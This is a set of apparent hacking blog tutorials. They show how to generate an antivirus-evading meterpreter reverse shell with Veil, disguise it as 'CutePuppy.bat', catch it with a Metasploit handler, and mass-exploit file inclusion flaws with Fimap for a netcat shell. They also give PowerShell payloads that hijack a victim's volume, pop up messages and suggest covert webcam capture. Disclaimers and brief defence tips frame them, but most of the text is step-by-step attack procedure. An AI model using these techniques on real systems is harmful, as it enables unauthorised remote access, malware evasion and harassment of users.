Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements

Mass Scanning a Website for File Inclusion Vulnerabilities using Fimap and Metasploitable

Fimap by Iman Karim (https://tha-imax.de/git/root/fimap) is a great tool to scan a website for File Inclusion vulnerabilities. In this short tutorial I show how to scan the entire Metasploitable2 Purposefully Vulnerable VM with Fimap and spawn a remote shell!

Mass Scanning

Fimap can scan a target website and harvest links from it and store them so they can be used as input to its mass scan feature. Simply run fimap and use the “-H” switch to tell it to harvest links, “-u” to tell it the target website IP, “-d [x]” to tell it how deep to look for links and finally “-w [outputdirectory]” to tell it where to store the links, like so:

fimap scan one

Now that we have a list of target links stored in the “/tmp/urllist” file, we simply feed this back into Fimap to look for vulnerabilities:

fimap -m -l ‘/tmp/urllist’

This will take forever to run as I told it to pretty much harvest the links from the entire Metasploitable VM in the previous command, but check out the results:

fimap scan metasploitable

Holy cats, 688 possible File Inclusion vulnerabilities!

Exploiting via Remote Shell

One of the great things about Fimap is its ability to create a remote shell with the vulnerable page. So let’s try it with one of the 688 vulnerable pages. To do so, we simply run “fimap” with the “-x” switch:

  1. Type “fimap -x”
  2. A list of scanned domains will appear, select the the one (“1”) we just scanned.
  3. A huge list of vulnerable pages will appear, so let’s select say, “100”.
  4. Now at the Available Attacks screen, select “#2 – Spawn Pentestmonkey’s reverse shell”

RFI LFI Fimap

It will then tell you to open another terminal and run Netcat (netcat -v -l -p 4444). Then just hit enter in fimap and you have a remote Netcat shell!

fimap reverse shell

As you can see we have opened a remote shell through on of the vulnerable pages, nice! Now let’s try the other 588 possibilities. Well, maybe not, lol!

Conclusion

File Inclusion vulnerabilities are becoming more and more rare with current coding practices, but hopefully this shows that File Inclusion coding errors can be exploited for detrimental results. Companies need to be sure to use secure coding practices and test their websites for common vulnerabilities.

If you liked the tutorial, and want to learn more about ethical hacking, check out my book, “Basic Security Testing with Kali Linux“.

Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit

Iran Thunderstruck

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no,no – so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably end you up in jail – so again, don’t do it. Lastly, this is not new, it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbel. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly we will need a willing Windows 7 system as a target, this attack did not seem to work very well using a VMware virtual machine for a target (the up volume loop seems to bog systems down pretty good), so I used a stand alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = “http://www.youtube.com/watch?v=v2AC41dglnM”
#Create hidden IE Com Object
$IEComObject = New-Object -com “InternetExplorer.Application”
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose “Loop will end at $EndTime”
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
$WscriptObject = New-Object -com wscript.shell
$WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) where the Up Volume key (char 175) is called repeatedly. As mentioned earlier, this loop seems to really draw down the target computer, you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt“.

3. Base64 encode the script:

Iran Thunderstruck 2

And that is it, now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

Iran Thunderstruck 3

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Iran Thunderstruck 4

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!

Bringing Metasploit Exploits to Life with PowerShell

You have a remote shell to a Windows box in Metasploit, very cool, but what can you do? Granted Metasploit is loaded with features, options and tons of post modules (which are all amazing by the way), but what if you want to do something a bit more custom? Say, like adding custom pop-ups and even voice, but you have no clue about programming in Ruby.

How about PowerShell?

Let me start this out by saying I am no programmer. Sure I have futzed around with various languages over the years, and even supervised programmers at a couple jobs – but trust me, I am not a programmer. Secondly, I never would have been able to do this without one of the Metasploit gods – Mubix over at Room362.com. Thanks Mubix!

Talking with a friend about exploit capabilities, we came up the thought that wouldn’t it be cool if when a machine was exploited during a red team pentest, if it would pop up a Windows error message on the screen saying, “Knock, Knock Neo.” You know, from the Matrix movie.

And wouldn’t it be cool if you could get the computer to speak to said victim in a woman’s voice saying the same thing? What if, as long as we are custom creating our Matrix-ish payload, we also wanted to pop up a picture on the target system of the green text filled Matrix screen? I mean wouldn’t that be cool too?

Well, with PowerShell, you can!

If you look at Mubix’s “Powershell Popups + Capture” article, you can see the step-by-step process that we will follow.

Create a text file containing the Powershell commands, I used something like this:

$shell = New-Object -ComObject “Shell.Application”;
$shell.minimizeall();
Start-Sleep -s 2;
[System.Reflection.Assembly]::LoadWithPartialName(“System.Windows.Forms”);
[System.Windows.Forms.MessageBox]::Show(“Knock, knock, Neo.” , “Status” , 2);
(New-Object –ComObject SAPI.SPVoice).Speak(“Knock, Knock Knee Oh, the Matrix has you!”);
c:\test\matrix.jpg;

The first two lines allow the script to clear the user’s screen by minimizing all open windows. We then pause the script for a couple seconds for dramatic effect. The next two lines pop up a Windows (Abort, Retry, Ignore) message box with the movie message, “Knock, Knock Neo.”

Once the user clicks on one of the message box buttons, the script calls the Windows built in text to speech capabilities to audibly speak the same message out of their speakers. Sometimes the words don’t come out exactly like they should so you need to help the Windows voice API by using slightly different, but similar sounding words (ex. “Knee Oh” instead of “Neo”).

The final command opens a Matrix .jpg file that we would need to have already uploaded to the system via the Meterpreter upload command. (Pick a big one that fills the screen!)

We need to take the text file and encode it as Mubix’s site shows:

PowerPoint Text to Speech

Then run the following command in our remote shell, adding in the encoded text stream above:

powershell -ep bypass -enc <Paste in the Encoded Text>

And that is it!

Powershell Message Box

One more step that would make this even more creepy (or visually convincing in a red team pentest) would be to use Meterpreter’s built in webcam capability to first snap a picture of the remote user at his computer, upload that picture to their system in place of the matrix.jpg, and then run the command for a more personalized message from “the Matrix”!

Best defense against these types of attacks is to never, ever open or run unexpected files or attachments in e-mails. Never use a USB drive that you find laying around your company. Avoid public Wi-Fi when possible. Finally, always use a script blocking program on your internet browser.